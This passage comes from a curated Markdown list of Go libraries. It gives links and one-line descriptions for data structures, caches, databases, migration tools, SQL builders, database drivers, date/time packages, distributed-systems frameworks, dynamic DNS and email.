- [typ](https://github.com/gurukami/typ) - Null Types, Safe primitive type conversion and fetching value from complex structures.
### Queues
- [deque](https://github.com/edwingeng/deque) - A highly optimized double-ended queue.
- [deque](https://github.com/gammazero/deque) - Fast ring-buffer deque (double-ended queue).
- [goconcurrentqueue](https://github.com/enriquebris/goconcurrentqueue) - Concurrent FIFO queue.
- [memlog](https://github.com/embano1/memlog) - An easy to use, lightweight, thread-safe and append-only in-memory data structure inspired by Apache Kafka.
- [queue](https://github.com/adrianbrad/queue) - Multiple thread-safe, generic queue implementations for Go.
### Sets
- [dsu](https://github.com/ihebu/dsu) - Disjoint Set data structure implementation in Go.
- [golang-set](https://github.com/deckarep/golang-set) - Thread-Safe and Non-Thread-Safe high-performance sets for Go.
- [goset](https://github.com/zoumo/goset) - A useful Set collection implementation for Go.
- [set](https://github.com/StudioSol/set) - Simple set data structure implementation in Go using LinkedHashMap.
### Text Analysis
- [bleve](https://github.com/blevesearch/bleve) - Modern text indexing library for go.
- [go-adaptive-radix-tree](https://github.com/plar/go-adaptive-radix-tree) - Go implementation of Adaptive Radix Tree.
- [go-edlib](https://github.com/hbollon/go-edlib) - Go string comparison and edit distance algorithms library (Levenshtein, LCS, Hamming, Damerau levenshtein, Jaro-Winkler, etc.) compatible with Unicode.
- [levenshtein](https://github.com/agext/levenshtein) - Levenshtein distance and similarity metrics with customizable edit costs and Winkler-like bonus for common prefix.
- [levenshtein](https://github.com/agnivade/levenshtein) - Implementation to calculate levenshtein distance in Go.
- [mspm](https://github.com/BlackRabbitt/mspm) - Multi-String Pattern Matching Algorithm for information retrieval.
- [parsefields](https://github.com/MonaxGT/parsefields) - Tools for parse JSON-like logs for collecting unique fields and events.
- [ptrie](https://github.com/viant/ptrie) - An implementation of prefix tree.
- [trie](https://github.com/derekparker/trie) - Trie implementation in Go.
### Trees
- [hashsplit](http://github.com/bobg/hashsplit) - Split byte streams into chunks, and arrange chunks into trees, with boundaries determined by content, not position.
- [merkle](https://github.com/bobg/merkle) - Space-efficient computation of Merkle root hashes and inclusion proofs.
- [skiplist](https://github.com/MauriceGit/skiplist) - Very fast Go Skiplist implementation.
- [skiplist](https://github.com/gansidui/skiplist) - Skiplist implementation in Go.
- [treap](https://github.com/perdata/treap) - Persistent, fast ordered map using tree heaps.
- [treemap](https://github.com/igrmk/treemap) - Generic key-sorted map using a red-black tree under the hood.
### Pipes
- [ordered-concurrently](https://github.com/tejzpr/ordered-concurrently) - Go module that processes work concurrently and returns output in a channel in the order of input.
- [parapipe](https://github.com/nazar256/parapipe) - FIFO Pipeline which parallels execution on each stage while maintaining the order of messages and results.
- [pipeline](https://github.com/hyfather/pipeline) - An implementation of pipelines with fan-in and fan-out.
**[⬆ back to top](#contents)**
## Database
### Caches
_Data stores with expiring records, in-memory distributed data stores, or in-memory subsets of file-based databases._
- [2q](https://github.com/floatdrop/2q) - 2Q in-memory cache implementation.
- [bcache](https://github.com/iwanbk/bcache) - Eventually consistent distributed in-memory cache Go library.
- [BigCache](https://github.com/allegro/bigcache) - Efficient key/value cache for gigabytes of data.
- [cache](https://github.com/akyoto/cache) - In-memory key:value store with expiration time, 0 dependencies, <100 LoC, 100% coverage.
- [cache2go](https://github.com/muesli/cache2go) - In-memory key:value cache which supports automatic invalidation based on timeouts.
- [cachego](https://github.com/faabiosr/cachego) - Golang Cache component for multiple drivers.
- [clusteredBigCache](https://github.com/oaStuff/clusteredBigCache) - BigCache with clustering support and individual item expiration.
- [couchcache](https://github.com/codingsince1985/couchcache) - RESTful caching micro-service backed by Couchbase server.
- [fastcache](https://github.com/VictoriaMetrics/fastcache) - fast thread-safe inmemory cache for big number of entries. Minimizes GC overhead.
- [GCache](https://github.com/bluele/gcache) - Cache library with support for expirable Cache, LFU, LRU and ARC.
- [gdcache](https://github.com/ulovecode/gdcache) - A pure non-intrusive cache library implemented by golang, you can use it to implement your own distributed cache.
- [go-cache](https://github.com/viney-shih/go-cache) - A flexible multi-layer Go caching library to deal with in-memory and shared cache by adopting Cache-Aside pattern.
- [go-mcache](https://github.com/OrlovEvgeny/go-mcache) - Fast in-memory key:value store/cache library. Pointer caches.
- [gocache](https://github.com/eko/gocache) - A complete Go cache library with multiple stores (memory, memcache, redis, ...), chainable, loadable, metrics cache and more.
- [gocache](https://github.com/yuseferi/gocache) - A data race free Go ache library with high performance and auto pruge functionality
- [groupcache](https://github.com/golang/groupcache) - Groupcache is a caching and cache-filling library, intended as a replacement for memcached in many cases.
- [imcache](https://github.com/erni27/imcache) - A generic in-memory cache Go library. It supports expiration, sliding expiration, max entries limit, eviction callbacks and sharding.
- [nscache](https://github.com/no-src/nscache) - A Go caching framework that supports multiple data source drivers.
- [remember-go](https://github.com/rocketlaunchr/remember-go) - A universal interface for caching slow database queries (backed by redis, memcached, ristretto, or in-memory).
- [theine](https://github.com/Yiling-J/theine-go) - High performance, near optimal in-memory cache with proactive TTL expiration and generics.
- [timedmap](https://github.com/zekroTJA/timedmap) - Map with expiring key-value pairs.
- [ttlcache](https://github.com/jellydator/ttlcache) - An in-memory cache with item expiration and generics.
- [ttlcache](https://github.com/cheshir/ttlcache) - In-memory key value storage with TTL for each record.
### Databases Implemented in Go
- [badger](https://github.com/dgraph-io/badger) - Fast key-value store in Go.
- [bbolt](https://github.com/etcd-io/bbolt) - An embedded key/value database for Go.
- [Bitcask](https://git.mills.io/prologic/bitcask) - Bitcask is an embeddable, persistent and fast key-value (KV) database written in pure Go with predictable read/write performance, low latency and high throughput thanks to the bitcask on-disk layout (LSM+WAL).
- [buntdb](https://github.com/tidwall/buntdb) - Fast, embeddable, in-memory key/value database for Go with custom indexing and spatial support.
- [clover](https://github.com/ostafen/clover) - A lightweight document-oriented NoSQL database written in pure Golang.
- [cockroach](https://github.com/cockroachdb/cockroach) - Scalable, Geo-Replicated, Transactional Datastore.
- [Coffer](https://github.com/claygod/coffer) - Simple ACID key-value database that supports transactions.
- [column](https://github.com/kelindar/column) - High-performance, columnar, embeddable in-memory store with bitmap indexing and transactions.
- [CovenantSQL](https://github.com/CovenantSQL/CovenantSQL) - CovenantSQL is a SQL database on blockchain.
- [Databunker](https://github.com/paranoidguy/databunker) - Personally identifiable information (PII) storage service built to comply with GDPR and CCPA.
- [dgraph](https://github.com/dgraph-io/dgraph) - Scalable, Distributed, Low Latency, High Throughput Graph Database.
- [diskv](https://github.com/peterbourgon/diskv) - Home-grown disk-backed key-value store.
- [dolt](https://github.com/dolthub/dolt) - Dolt – It's Git for Data.
- [dtf](https://github.com/dtm-labs/dtf) - A distributed transaction manager. Support XA, TCC, SAGA, Reliable Messages.
- [eliasdb](https://github.com/krotik/eliasdb) - Dependency-free, transactional graph database with REST API, phrase search and SQL-like query language.
- [godis](https://github.com/hdt3213/godis) - A Golang implemented high-performance Redis server and cluster.
- [goleveldb](https://github.com/syndtr/goleveldb) - Implementation of the [LevelDB](https://github.com/google/leveldb) key/value database in Go.
- [hare](https://github.com/jameycribbs/hare) - A simple database management system that stores each table as a text file of line-delimited JSON.
- [immudb](https://github.com/codenotary/immudb) - immudb is a lightweight, high-speed immutable database for systems and applications written in Go.
- [influxdb](https://github.com/influxdb/influxdb) - Scalable datastore for metrics, events, and real-time analytics.
- [ledisdb](https://github.com/siddontang/ledisdb) - Ledisdb is a high performance NoSQL like Redis based on LevelDB.
- [levigo](https://github.com/jmhodges/levigo) - Levigo is a Go wrapper for LevelDB.
- [libradb](https://github.com/amit-davidson/LibraDB) - LibraDB is a simple database with less then 1000 lines of code for learning.
- [lotusdb](https://github.com/flower-corp/lotusdb) - Fast k/v database compatible with lsm and b+tree.
- [Milvus](https://github.com/milvus-io/milvus) - Milvus is a vector database for embedding management, analytics and search.
- [moss](https://github.com/couchbase/moss) - Moss is a simple LSM key-value storage engine written in 100% Go.
- [nutsdb](https://github.com/xujiajun/nutsdb) - Nutsdb is a simple, fast, embeddable, persistent key/value store written in pure Go. It supports fully serializable transactions and many data structures such as list, set, sorted set.
- [objectbox-go](https://github.com/objectbox/objectbox-go) - High-performance embedded Object Database (NoSQL) with Go API.
- [piladb](https://github.com/fern4lvarez/piladb) - Lightweight RESTful database engine based on stack data structures.
- [pogreb](https://github.com/akrylysov/pogreb) - Embedded key-value store for read-heavy workloads.
- [prometheus](https://github.com/prometheus/prometheus) - Monitoring system and time series database.
- [pudge](https://github.com/recoilme/pudge) - Fast and simple key/value store written using Go's standard library.
- [regatta](https://github.com/jamf/regatta) - Fast, simple, geo-distributed KV store built for cloud native era.
- [rosedb](https://github.com/roseduan/rosedb) - An embedded k-v database based on LSM+WAL, supports string, list, hash, set, zset.
- [rqlite](https://github.com/rqlite/rqlite) - The lightweight, distributed, relational database built on SQLite.
- [tempdb](https://github.com/rafaeljesus/tempdb) - Key-value store for temporary items.
- [tidb](https://github.com/pingcap/tidb) - TiDB is a distributed SQL database. Inspired by the design of Google F1.
- [tiedot](https://github.com/HouzuoGuo/tiedot) - Your NoSQL database powered by Golang.
- [unitdb](https://github.com/unit-io/unitdb) - Fast timeseries database for IoT, realtime messaging applications. Access unitdb with pubsub over tcp or websocket using github.com/unit-io/unitd application.
- [Vasto](https://github.com/chrislusf/vasto) - A distributed high-performance key-value store. On Disk. Eventual consistent. HA. Able to grow or shrink without service interruption.
- [VictoriaMetrics](https://github.com/VictoriaMetrics/VictoriaMetrics) - fast, resource-effective and scalable open source time series database. May be used as long-term remote storage for Prometheus. Supports PromQL.
### Database Schema Migration
- [atlas](https://github.com/ariga/atlas) - A Database Toolkit. A CLI designed to help companies better work with their data.
- [avro](https://github.com/khezen/avro) - Discover SQL schemas and convert them to AVRO schemas. Query SQL records into AVRO bytes.
- [bytebase](https://github.com/bytebase/bytebase) - Safe database schema change and version control for DevOps teams.
- [darwin](https://github.com/GuiaBolso/darwin) - Database schema evolution library for Go.
- [dbmate](https://github.com/amacneil/dbmate) - A lightweight, framework-agnostic database migration tool.
- [go-fixtures](https://github.com/RichardKnop/go-fixtures) - Django style fixtures for Golang's excellent built-in database/sql library.
- [go-pg-migrate](https://github.com/lawzava/go-pg-migrate) - CLI-friendly package for go-pg migrations management.
- [go-pg-migrations](https://github.com/robinjoseph08/go-pg-migrations) - A Go package to help write migrations with go-pg/pg.
- [goavro](https://github.com/linkedin/goavro) - A Go package that encodes and decodes Avro data.
- [godfish](https://github.com/rafaelespinoza/godfish) - Database migration manager, works with native query language. Support for cassandra, mysql, postgres, sqlite3.
- [goose](https://github.com/pressly/goose) - Database migration tool. You can manage your database's evolution by creating incremental SQL or Go scripts.
- [gorm-seeder](https://github.com/Kachit/gorm-seeder) - Simple database seeder for Gorm ORM.
- [gormigrate](https://github.com/go-gormigrate/gormigrate) - Database schema migration helper for Gorm ORM.
- [libschema](https://github.com/muir/libschema) - Define your migrations separately in each library. Migrations for open source libraries. MySQL & PostgreSQL.
- [migrate](https://github.com/golang-migrate/migrate) - Database migrations. CLI and Golang library.
- [migrator](https://github.com/lopezator/migrator) - Dead simple Go database migration library.
- [migrator](https://github.com/larapulse/migrator) - MySQL database migrator designed to run migrations to your features and manage database schema update with intuitive go code.
- [schema](https://github.com/adlio/schema) - Library to embed schema migrations for database/sql-compatible databases inside your Go binaries.
- [skeema](https://github.com/skeema/skeema) - Pure-SQL schema management system for MySQL, with support for sharding and external online schema change tools.
- [soda](https://github.com/gobuffalo/pop/tree/master/soda) - Database migration, creation, ORM, etc... for MySQL, PostgreSQL, and SQLite.
- [sql-migrate](https://github.com/rubenv/sql-migrate) - Database migration tool. Allows embedding migrations into the application using go-bindata.
- [sqlize](https://github.com/sunary/sqlize) - Database migration generator. Allows generate sql migration from model and existing sql by differ them.
### Database Tools
- [chproxy](https://github.com/Vertamedia/chproxy) - HTTP proxy for ClickHouse database.
- [clickhouse-bulk](https://github.com/nikepan/clickhouse-bulk) - Collects small inserts and sends big requests to ClickHouse servers.
- [datagen](https://github.com/codingconcepts/datagen) - A fast data generator that's multi-table aware and supports multi-row DML.
- [dbbench](https://github.com/sj14/dbbench) - Database benchmarking tool with support for several databases and scripts.
- [dynago](https://github.com/twharmon/dynago) - Simplify working with AWS DynamoDB.
- [go-mysql](https://github.com/siddontang/go-mysql) - Go toolset to handle MySQL protocol and replication.
- [go-mysql-elasticsearch](https://github.com/siddontang/go-mysql-elasticsearch) - Sync your MySQL data into Elasticsearch automatically.
- [hasql](https://golang.yandex/hasql) - Library for accessing multi-host SQL database installations.
- [kingshard](https://github.com/flike/kingshard) - kingshard is a high performance proxy for MySQL powered by Golang.
- [octillery](https://github.com/knocknote/octillery) - Go package for sharding databases ( Supports every ORM or raw SQL ).
- [onedump](https://github.com/liweiyi88/onedump) - Database backup from different drivers to different destinations with one command and configuration.
- [orchestrator](https://github.com/github/orchestrator) - MySQL replication topology manager & visualizer.
- [pg_timetable](https://github.com/cybertec-postgresql/pg_timetable) - Advanced scheduling for PostgreSQL.
- [pgweb](https://github.com/sosedoff/pgweb) - Web-based PostgreSQL database browser.
- [prep](https://github.com/hexdigest/prep) - Use prepared SQL statements without changing your code.
- [pREST](https://github.com/prest/prest) - Simplify and accelerate development, ⚡ instant, realtime, high-performance on any Postgres application, existing or new.
- [rdb](https://github.com/HDT3213/rdb) - Redis RDB file parser for secondary development and memory analysis.
- [rwdb](https://github.com/andizzle/rwdb) - rwdb provides read replica capability for multiple database servers setup.
- [vitess](https://github.com/youtube/vitess) - vitess provides servers and tools which facilitate scaling of MySQL databases for large scale web services.
### SQL Query Builders
_Libraries for building and using SQL._
- [bqb](https://github.com/nullism/bqb) - Lightweight and easy to learn query builder.
- [buildsqlx](https://github.com/arthurkushman/buildsqlx) - Go database query builder library for PostgreSQL.
- [builq](https://github.com/cristalhq/builq) - Easily build SQL queries in Go.
- [dbq](https://github.com/rocketlaunchr/dbq) - Zero boilerplate database operations for Go.
- [Dotsql](https://github.com/gchaincl/dotsql) - Go library that helps you keep sql files in one place and use them with ease.
- [gendry](https://github.com/didi/gendry) - Non-invasive SQL builder and powerful data binder.
- [godbal](https://github.com/xujiajun/godbal) - Database Abstraction Layer (dbal) for go. Support SQL builder and get result easily.
- [goqu](https://github.com/doug-martin/goqu) - Idiomatic SQL builder and query library.
- [gosql](https://github.com/twharmon/gosql) - SQL Query builder with better null values support.
- [igor](https://github.com/galeone/igor) - Abstraction layer for PostgreSQL that supports advanced functionality and uses gorm-like syntax.
- [jet](https://github.com/go-jet/jet) - Framework for writing type-safe SQL queries in Go, with ability to easily convert database query result into desired arbitrary object structure.
- [ormlite](https://github.com/pupizoid/ormlite) - Lightweight package containing some ORM-like features and helpers for sqlite databases.
- [ozzo-dbx](https://github.com/go-ozzo/ozzo-dbx) - Powerful data retrieval methods as well as DB-agnostic query building capabilities.
- [qry](https://github.com/HnH/qry) - Tool that generates constants from files with raw SQL queries.
- [sg](https://github.com/go-the-way/sg) - A SQL Gen for generating standard SQLs(supports: CRUD) written in Go.
- [sq](https://github.com/bokwoon95/go-structured-query) - Type-safe SQL builder and struct mapper for Go.
- [sqlc](https://github.com/kyleconroy/sqlc) - Generate type-safe code from SQL.
- [sqlf](https://github.com/leporo/sqlf) - Fast SQL query builder.
- [sqlingo](https://github.com/lqs/sqlingo) - A lightweight DSL to build SQL in Go.
- [sqrl](https://github.com/elgris/sqrl) - SQL query builder, fork of Squirrel with improved performance.
- [Squalus](https://gitlab.com/qosenergy/squalus) - Thin layer over the Go SQL package that makes it easier to perform queries.
- [Squirrel](https://github.com/Masterminds/squirrel) - Go library that helps you build SQL queries.
- [xo](https://github.com/knq/xo) - Generate idiomatic Go code for databases based on existing schema definitions or custom queries supporting PostgreSQL, MySQL, SQLite, Oracle, and Microsoft SQL Server.
**[⬆ back to top](#contents)**
## Database Drivers
### Interfaces to Multiple Backends
- [cayley](https://github.com/google/cayley) - Graph database with support for multiple backends.
- [dsc](https://github.com/viant/dsc) - Datastore connectivity for SQL, NoSQL, structured files.
- [go-transaction-manager](https://github.com/avito-tech/go-transaction-manager) - Transaction manager with multiple adapters (sql, sqlx, gorm, mongo, ...) controls transaction boundaries.
- [gokv](https://github.com/philippgille/gokv) - Simple key-value store abstraction and implementations for Go (Redis, Consul, etcd, bbolt, BadgerDB, LevelDB, Memcached, DynamoDB, S3, PostgreSQL, MongoDB, CockroachDB and many more).
### Relational Database Drivers
- [avatica](https://github.com/apache/calcite-avatica-go) - Apache Avatica/Phoenix SQL driver for database/sql.
- [bgc](https://github.com/viant/bgc) - Datastore Connectivity for BigQuery for go.
- [firebirdsql](https://github.com/nakagami/firebirdsql) - Firebird RDBMS SQL driver for Go.
- [go-adodb](https://github.com/mattn/go-adodb) - Microsoft ActiveX Object DataBase driver for go that uses database/sql.
- [go-mssqldb](https://github.com/denisenkom/go-mssqldb) - Microsoft MSSQL driver for Go.
- [go-oci8](https://github.com/mattn/go-oci8) - Oracle driver for go that uses database/sql.
- [go-sql-driver/mysql](https://github.com/go-sql-driver/mysql) - MySQL driver for Go.
- [go-sqlite3](https://github.com/mattn/go-sqlite3) - SQLite3 driver for go that uses database/sql.
- [godror](https://github.com/godror/godror) - Oracle driver for Go, using the ODPI-C driver.
- [gofreetds](https://github.com/minus5/gofreetds) - Microsoft MSSQL driver. Go wrapper over [FreeTDS](https://www.freetds.org).
- [KSQL](https://github.com/VinGarcia/ksql) - A Simple and Powerful Golang SQL Library
- [pgx](https://github.com/jackc/pgx) - PostgreSQL driver supporting features beyond those exposed by database/sql.
- [pig](https://github.com/alexeyco/pig) - Simple [pgx](https://github.com/jackc/pgx) wrapper to execute and [scan](https://github.com/georgysavva/scany) query results easily.
- [pq](https://github.com/lib/pq) - Pure Go Postgres driver for database/sql.
- [Sqinn-Go](https://github.com/cvilsmeier/sqinn-go) - SQLite with pure Go.
- [sqlhooks](https://github.com/qustavo/sqlhooks) - Attach hooks to any database/sql driver.
- [surrealdb.go](https://github.com/surrealdb/surrealdb.go) - SurrealDB Driver for Go.
- [ydb-go-sdk](https://github.com/ydb-platform/ydb-go-sdk) - native and database/sql driver YDB (Yandex Database)
### NoSQL Database Drivers
- [aerospike-client-go](https://github.com/aerospike/aerospike-client-go) - Aerospike client in Go language.
- [arangolite](https://github.com/solher/arangolite) - Lightweight golang driver for ArangoDB.
- [asc](https://github.com/viant/asc) - Datastore Connectivity for Aerospike for go.
- [forestdb](https://github.com/couchbase/goforestdb) - Go bindings for ForestDB.
- [go-couchbase](https://github.com/couchbase/go-couchbase) - Couchbase client in Go.
- [go-pilosa](https://github.com/pilosa/go-pilosa) - Go client library for Pilosa.
- [go-rejson](https://github.com/nitishm/go-rejson) - Golang client for redislabs' ReJSON module using Redigo golang client. Store and manipulate structs as JSON objects in redis with ease.
- [gocb](https://github.com/couchbase/gocb) - Official Couchbase Go SDK.
- [gocosmos](https://github.com/btnguyen2k/gocosmos) - REST client and standard `database/sql` driver for Azure Cosmos DB.
- [gocql](https://gocql.github.io) - Go language driver for Apache Cassandra.
- [godis](https://github.com/piaohao/godis) - redis client implement by golang, inspired by jedis.
- [godscache](https://github.com/defcronyke/godscache) - A wrapper for the Google Cloud Platform Go Datastore package that adds caching using memcached.
- [gomemcache](https://github.com/bradfitz/gomemcache/) - memcache client library for the Go programming language.
- [gorethink](https://github.com/dancannon/gorethink) - Go language driver for RethinkDB.
- [goriak](https://github.com/zegl/goriak) - Go language driver for Riak KV.
- [Kivik](https://github.com/go-kivik/kivik) - Kivik provides a common Go and GopherJS client library for CouchDB, PouchDB, and similar databases.
- [mgm](https://github.com/kamva/mgm) - MongoDB model-based ODM for Go (based on official MongoDB driver).
- [mgo](https://github.com/globalsign/mgo) - (unmaintained) MongoDB driver for the Go language that implements a rich and well tested selection of features under a very simple API following standard Go idioms.
- [mongo-go-driver](https://github.com/mongodb/mongo-go-driver) - Official MongoDB driver for the Go language.
- [neo4j](https://github.com/cihangir/neo4j) - Neo4j Rest API Bindings for Golang.
- [Neo4j-GO](https://github.com/davemeehan/Neo4j-GO) - Neo4j REST Client in golang.
- [neoism](https://github.com/jmcvetta/neoism) - Neo4j client for Golang.
- [qmgo](https://github.com/qiniu/qmgo) - The MongoDB driver for Go. It‘s based on official MongoDB driver but easier to use like Mgo.
- [redeo](https://github.com/bsm/redeo) - Redis-protocol compatible TCP servers/services.
- [redigo](https://github.com/gomodule/redigo) - Redigo is a Go client for the Redis database.
- [redis](https://github.com/redis/go-redis) - Redis client for Golang.
- [rueidis](http://github.com/rueian/rueidis) - Fast Redis RESP3 client with auto pipelining and server-assisted client side caching.
- [xredis](https://github.com/shomali11/xredis) - Typesafe, customizable, clean & easy to use Redis client.
### Search and Analytic Databases
- [elastic](https://github.com/olivere/elastic) - Elasticsearch client for Go.
- [elasticsql](https://github.com/cch123/elasticsql) - Convert sql to elasticsearch dsl in Go.
- [elastigo](https://github.com/mattbaird/elastigo) - Elasticsearch client library.
- [go-elasticsearch](https://github.com/elastic/go-elasticsearch) - Official Elasticsearch client for Go.
- [goes](https://github.com/OwnLocal/goes) - Library to interact with Elasticsearch.
- [skizze](https://github.com/seiflotfy/skizze) - probabilistic data-structures service and storage.
**[⬆ back to top](#contents)**
## Date and Time
_Libraries for working with dates and times._
- [carbon](https://github.com/golang-module/carbon) - A simple, semantic and developer-friendly golang package for datetime.
- [carbon](https://github.com/uniplaces/carbon) - Simple Time extension with a lot of util methods, ported from PHP Carbon library.
- [cronrange](https://github.com/1set/cronrange) - Parses Cron-style time range expressions, checks if the given time is within any ranges.
- [date](https://github.com/rickb777/date) - Augments Time for working with dates, date ranges, time spans, periods, and time-of-day.
- [dateparse](https://github.com/araddon/dateparse) - Parse date's without knowing format in advance.
- [durafmt](https://github.com/hako/durafmt) - Time duration formatting library for Go.
- [feiertage](https://github.com/wlbr/feiertage) - Set of functions to calculate public holidays in Germany, incl. specialization on the states of Germany (Bundesländer). Things like Easter, Pentecost, Thanksgiving...
- [go-anytime](https://github.com/ijt/go-anytime) - Parse dates/times like "next dec 22nd at 3pm" and ranges like "from today until next thursday" without knowing the format in advance.
- [go-persian-calendar](https://github.com/yaa110/go-persian-calendar) - The implementation of the Persian (Solar Hijri) Calendar in Go (golang).
- [go-str2duration](https://github.com/xhit/go-str2duration) - Convert string to duration. Support time.Duration returned string and more.
- [go-sunrise](https://github.com/nathan-osman/go-sunrise) - Calculate the sunrise and sunset times for a given location.
- [go-week](https://github.com/stoewer/go-week) - An efficient package to work with ISO8601 week dates.
- [gostradamus](https://github.com/bykof/gostradamus) - A Go package for working with dates.
- [iso8601](https://github.com/relvacode/iso8601) - Efficiently parse ISO8601 date-times without regex.
- [kair](https://github.com/GuilhermeCaruso/kair) - Date and Time - Golang Formatting Library.
- [now](https://github.com/jinzhu/now) - Now is a time toolkit for golang.
- [NullTime](https://github.com/kirillDanshin/nulltime) - Nullable `time.Time`.
- [strftime](https://github.com/awoodbeck/strftime) - C99-compatible strftime formatter.
- [timespan](https://github.com/SaidinWoT/timespan) - For interacting with intervals of time, defined as a start time and a duration.
- [timeutil](https://github.com/leekchan/timeutil) - Useful extensions (Timedelta, Strftime, ...) to the golang's time package.
- [tuesday](https://github.com/osteele/tuesday) - Ruby-compatible Strftime function.
**[⬆ back to top](#contents)**
## Distributed Systems
_Packages that help with building Distributed Systems._
- [arpc](https://github.com/lesismal/arpc) - More effective network communication, support two-way-calling, notify, broadcast.
- [celeriac](https://github.com/svcavallar/celeriac.v1) - Library for adding support for interacting and monitoring Celery workers, tasks and events in Go.
- [consistent](https://github.com/buraksezer/consistent) - Consistent hashing with bounded loads.
- [consistenthash](https://github.com/mbrostami/consistenthash) - Consistent hashing with configurable replicas.
- [dht](https://github.com/anacrolix/dht) - BitTorrent Kademlia DHT implementation.
- [digota](https://github.com/digota/digota) - grpc ecommerce microservice.
- [dot](https://github.com/dotchain/dot/) - distributed sync using operational transformation/OT.
- [doublejump](https://github.com/edwingeng/doublejump) - A revamped Google's jump consistent hash.
- [dragonboat](https://github.com/lni/dragonboat) - A feature complete and high performance multi-group Raft library in Go.
- [Dragonfly](https://github.com/dragonflyoss/Dragonfly2) - Provide efficient, stable and secure file distribution and image acceleration based on p2p technology to be the best practice and standard solution in cloud native architectures.
- [drmaa](https://github.com/dgruber/drmaa) - Job submission library for cluster schedulers based on the DRMAA standard.
- [dynamolock](https://cirello.io/dynamolock) - DynamoDB-backed distributed locking implementation.
- [dynatomic](https://github.com/tylfin/dynatomic) - A library for using DynamoDB as an atomic counter.
- [emitter-io](https://github.com/emitter-io/emitter) - High performance, distributed, secure and low latency publish-subscribe platform built with MQTT, Websockets and love.
- [failured](https://github.com/andy2046/failured) - adaptive accrual failure detector for distributed systems.
- [flowgraph](https://github.com/vectaport/flowgraph) - flow-based programming package.
- [gleam](https://github.com/chrislusf/gleam) - Fast and scalable distributed map/reduce system written in pure Go and Luajit, combining Go's high concurrency with Luajit's high performance, runs standalone or distributed.
- [glow](https://github.com/chrislusf/glow) - Easy-to-Use scalable distributed big data processing, Map-Reduce, DAG execution, all in pure Go.
- [gmsec](https://github.com/gmsec/micro) - A Go distributed systems development framework.
- [go-doudou](https://github.com/unionj-cloud/go-doudou) - A gossip protocol and OpenAPI 3.0 spec based decentralized microservice framework. Built-in go-doudou cli focusing on low-code and rapid dev can power up your productivity.
- [go-health](https://github.com/InVisionApp/go-health) - Library for enabling asynchronous dependency health checks in your service.
- [go-jump](https://github.com/dgryski/go-jump) - Port of Google's "Jump" Consistent Hash function.
- [go-kit](https://github.com/go-kit/kit) - Microservice toolkit with support for service discovery, load balancing, pluggable transports, request tracking, etc.
- [go-micro](https://github.com/micro/go-micro) - A distributed systems development framework.
- [go-mysql-lock](https://github.com/sanketplus/go-mysql-lock) - MySQL based distributed lock.
- [go-pdu](https://github.com/pdupub/go-pdu) - A decentralized identity-based social network.
- [go-sundheit](https://github.com/AppsFlyer/go-sundheit) - A library built to provide support for defining async service health checks for golang services.
- [go-zero](https://github.com/tal-tech/go-zero) - A web and rpc framework. It's born to ensure the stability of the busy sites with resilient design. Builtin goctl greatly improves the development productivity.
- [gorpc](https://github.com/valyala/gorpc) - Simple, fast and scalable RPC library for high load.
- [grpc-go](https://github.com/grpc/grpc-go) - The Go language implementation of gRPC. HTTP/2 based RPC.
- [hprose](https://github.com/hprose/hprose-golang) - Very newbility RPC Library, support 25+ languages now.
- [jsonrpc](https://github.com/osamingo/jsonrpc) - The jsonrpc package helps implement of JSON-RPC 2.0.
- [jsonrpc](https://github.com/ybbus/jsonrpc) - JSON-RPC 2.0 HTTP client implementation.
- [Kitex](https://github.com/cloudwego/kitex) - A high-performance and strong-extensibility Golang RPC framework that helps developers build microservices. If the performance and extensibility are the main concerns when you develop microservices, Kitex can be a good choice.
- [Kratos](https://github.com/go-kratos/kratos) - A modular-designed and easy-to-use microservices framework in Go.
- [liftbridge](https://github.com/liftbridge-io/liftbridge) - Lightweight, fault-tolerant message streams for NATS.
- [lura](https://github.com/luraproject/lura) - Ultra performant API Gateway framework with middlewares.
- [micro](https://github.com/micro/micro) - A distributed systems runtime for the cloud and beyond.
- [NATS](https://github.com/nats-io/gnatsd) - Lightweight, high performance messaging system for microservices, IoT, and cloud native systems.
- [outboxer](https://github.com/italolelis/outboxer) - Outboxer is a go library that implements the outbox pattern.
- [pglock](https://cirello.io/pglock) - PostgreSQL-backed distributed locking implementation.
- [pjrpc](https://gitlab.com/pjrpc/pjrpc) - Golang JSON-RPC Server-Client with Protobuf spec.
- [raft](https://github.com/hashicorp/raft) - Golang implementation of the Raft consensus protocol, by HashiCorp.
- [raft](https://github.com/etcd-io/raft) - Go implementation of the Raft consensus protocol, by CoreOS.
- [rain](https://github.com/cenkalti/rain) - BitTorrent client and library.
- [redis-lock](https://github.com/bsm/redislock) - Simplified distributed locking implementation using Redis.
- [resgate](https://resgate.io/) - Realtime API Gateway for building REST, real time, and RPC APIs, where all clients are synchronized seamlessly.
- [ringpop-go](https://github.com/uber/ringpop-go) - Scalable, fault-tolerant application-layer sharding for Go applications.
- [rpcx](https://github.com/smallnest/rpcx) - Distributed pluggable RPC service framework like alibaba Dubbo.
- [Semaphore](https://github.com/jexia/semaphore) - A straightforward (micro) service orchestrator.
- [sleuth](https://github.com/ursiform/sleuth) - Library for master-less p2p auto-discovery and RPC between HTTP services (using [ZeroMQ](https://github.com/zeromq/libzmq)).
- [Temporal](https://github.com/temporalio/sdk-go) - Durable execution system for making code fault-tolerant and simple.
- [torrent](https://github.com/anacrolix/torrent) - BitTorrent client package.
**[⬆ back to top](#contents)**
## Dynamic DNS
_Tools for updating dynamic DNS records._
- [DDNS](https://github.com/skibish/ddns) - Personal DDNS client with Digital Ocean Networking DNS as backend.
- [dyndns](https://gitlab.com/alcastle/dyndns) - Background Go process to regularly and automatically check your IP Address and make updates to (one or many) Dynamic DNS records for Google domains whenever your address changes.
- [GoDNS](https://github.com/timothyye/godns) - A dynamic DNS client tool, supports DNSPod & HE.net, written in Go.
**[⬆ back to top](#contents)**
## Email
_Libraries and tools that implement email creation and sending._
- [chasquid](https://blitiri.com.ar/p/chasquid) - SMTP server written in Go.
- [douceur](https://github.com/aymerick/douceur) - CSS inliner for your HTML emails.
- [email](https://github.com/jordan-wright/email) - A robust and flexible email library for Go.
- [email-verifier](https://github.com/AfterShip/email-verifier) - A Go library for email verification without sending any emails.
- [go-dkim](https://github.com/toorop/go-dkim) - DKIM library, to sign & verify email.
- [go-email-normalizer](https://github.com/dimuska139/go-email-normalizer) - Golang library for providing a canonical representation of email address.
- [go-email-validator](https://github.com/go-email-validator/go-email-validator) - Modular email validator for syntax, disposable, smtp, etc... checking.
- [go-imap](https://github.com/emersion/go-imap) - IMAP library for clients and servers.
- [go-mail](https://github.com/wneessen/go-mail) - A simple Go library for sending mails in Go.
- [go-message](https://github.com/emersion/go-message) - Streaming library for the Internet Message Format and mail messages.
